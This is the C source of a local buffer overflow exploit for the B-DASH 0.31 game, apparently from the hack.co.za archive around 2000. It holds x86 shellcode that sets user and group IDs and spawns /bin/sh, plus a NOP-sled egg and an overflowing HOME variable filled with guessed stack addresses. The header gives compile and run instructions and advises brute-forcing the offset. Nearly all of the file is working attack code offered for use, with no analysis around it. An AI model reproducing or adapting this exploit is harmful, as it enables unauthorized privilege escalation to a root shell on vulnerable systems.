/*
 *
 *   B-DASH 0.31 buffer overflow
 *
 *    by   plaguez
 *         dube0866@eurobretagne.fr
 *         http://www.innu.org
 *
 *
 *  compile:   cc bdexp.c -o bdexp
 *  exec:      ./bdexp 8
 *         or  ./bdexp 4
 *         or  ./bdexp 24 ...
 *  you may want to brute-force the offset (argv[1])
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define EGGSIZE 2048

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

unsigned long get_sp()
{
  asm("movl %esp,%eax");
}

char *buffer;
char *egg;

main(int argc,char **argv)
{
  int i;
  int bsize=1124,offset;
  long *adpt;
  char *pt;

  if(argc!=2)
    {
      printf("\nusage  %s <offset>",argv[0]);
      exit(1);
    }
  offset=atoi(argv[1]);
  egg=(char *)malloc(EGGSIZE);
  buffer=(char *)malloc(bsize);

  pt=buffer;
  adpt=(long *) pt;
  for (i = 0; i <= bsize-4; i += 4)
    *(adpt++) = get_sp() - offset;

  memset(egg, 0x90,EGGSIZE);
  memcpy(&egg[EGGSIZE-strlen(shellcode)-2], shellcode, strlen(shellcode));

  egg[EGGSIZE-1] = 0;

  setenv("BUFF",egg,1);
  setenv("HOME", buffer, 1);

  printf("\nb-dashing ...\n");
  execl("/usr/games/bdash", "/usr/games/bdash", NULL);
}
/*                    www.hack.co.za              [2000]*/